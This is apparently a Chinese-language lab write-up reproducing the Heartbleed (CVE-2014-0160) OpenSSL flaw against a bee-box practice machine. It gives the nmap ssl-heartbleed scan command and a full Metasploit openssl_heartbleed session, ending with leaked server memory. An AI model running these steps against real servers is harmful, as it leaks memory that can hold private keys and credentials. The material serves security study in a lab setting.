心脏出血漏洞复现
漏洞成因
由于memcpy()調用受害者輸入內容作為長度參數時沒有提前進行邊界檢查,攻擊者可以追蹤openssl分配的64kb的緩存空間,將超出必要范圍的字節信息復制到緩存當中再返回緩存內容,這樣一來受害者的內存內容就會以每次64KB的速度進行泄露
復現過程
準備工作
kali:192.168.239.131
bee-box:192.168.239.138
開始復現
kali ping bee-box查看連通性
隨后nmap -O查看8443是否開放
隨后使用nmap的ssl-heartbleed.nse掃描查看是否存在漏洞
nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.239.138
存在漏洞,隨后使用msf進行攻擊
root@192:~# msfconsole
±------------------------------------------------------+
| METASPLOIT by Rapid7 |
±--------------------------±--------------------------+
| __________________ | |
| c((o((() | |""""""""""""|====[*** |
| )=\ | | EXPLOIT \ |
| // \ | |_____ |
| // \ | |[msf >]====\ |
| // \ | |______________________\ |
| // RECON \ | (@)(@)(@)(@)(@)(@)(@)/ |
| // \ | ********************* |
±--------------------------±--------------------------+
| o O o | ‘///’/ |
| o O | )( |
| o | .’ LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / ||_ \ |
| | PAYLOAD |""_, | / (|| \ |
| |________________||)__| | | __||_) | |
| |(@)(@)"""|(@)(@)|(@) | " || " |
| = = = = = = = = = = = = | ‘--------------’ |
±--------------------------±--------------------------+
- – --=[ 2076 exploits - 1124 auxiliary - 352 post ]
- – --=[ 592 payloads - 45 encoders - 10 nops ]
- – --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf6 > search heartbleed
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak
1 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/server/openssl_heartbeat_client_memory
msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, “None” to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
SCAN Check hosts for vulnerability
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.239.138
rhost => 192.168.239.138
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[] 192.168.239.138:8443 - Leaking heartbeat response #1
[] 192.168.239.138:8443 - Sending Client Hello…
[] 192.168.239.138:8443 - SSL record #1:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 86
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 82
[] 192.168.239.138:8443 - Type: Server Hello (2)
[] 192.168.239.138:8443 - Server Hello Version: 0x0301
[] 192.168.239.138:8443 - Server Hello random data: 62202699b1eeba384c601bfa314e64ac091a7553f2a15a7aa567f552654ca23e
[] 192.168.239.138:8443 - Server Hello Session ID length: 32
[] 192.168.239.138:8443 - Server Hello Session ID: 96ae86840850e9cb77ceabcf847ce4309d3abd9e2cf53e50c1b0a9845e524383
[] 192.168.239.138:8443 - SSL record #2:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 675
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 671
[] 192.168.239.138:8443 - Type: Certificate Data (11)
[] 192.168.239.138:8443 - Certificates length: 668
[] 192.168.239.138:8443 - Data length: 671
[] 192.168.239.138:8443 - Certificate #1:
[] 192.168.239.138:8443 - Certificate #1: Length: 665
[] 192.168.239.138:8443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, issuer=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, serial=#OpenSSL::BN:0x00005582db39cb88, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[] 192.168.239.138:8443 - SSL record #3:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 203
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 199
[] 192.168.239.138:8443 - Type: Server Key Exchange (12)
[] 192.168.239.138:8443 - SSL record #4:
[] 192.168.239.138:8443 - Type: 22
[] 192.168.239.138:8443 - Version: 0x0301
[] 192.168.239.138:8443 - Length: 4
[] 192.168.239.138:8443 - Handshake #1:
[] 192.168.239.138:8443 - Length: 0
[] 192.168.239.138:8443 - Type: Server Hello Done (14)
[] 192.168.239.138:8443 - Sending Heartbeat…
[] 192.168.239.138:8443 - Heartbeat response, 13027 bytes
[+] 192.168.239.138:8443 - Heartbeat response with leak, 13027 bytes
[] 192.168.239.138:8443 - Printable info leaked:
…b…[…K~#.Mu…@…%....f.....".!.9.8.........5.............................3.2.....E.D...../...A.........................................c.v...........R.z.....3.J...0...h.6.E.a.......&...4. ...g..b…d…|…k.s…2…>…w.Y.A…e.7…F…w.[…K…i.O…P…=.d…P…j…;…p…U…0.}.B.’…e.;…’.#.T…F.&…x…-…Z…~.G…X…<…@…D… …Q…~…{.y…^.t.s.I.,.q.n…o.m.l.k.j.V.i….g.f......g.f......g.f.....…a.u.y…Z…C.Y./.?.X…9.W…V.T….<…Q.O.+…%.J.2…E…D.C.A…@.=.H…4.R.M.#.5…:.6.h…5.m…/…-.%…)…L.".!..N…:…l…r…(…x…f…S…]…t.1…c.b.S.>.9.7.3… repeated 11974 times …
[] 192.168.239.138:8443 - Scanned 1 of 1 hosts (100% complete)
總結
- 上一篇: CVE-2014-0160:心脏出血(心
- 下一篇: visto VTL搭建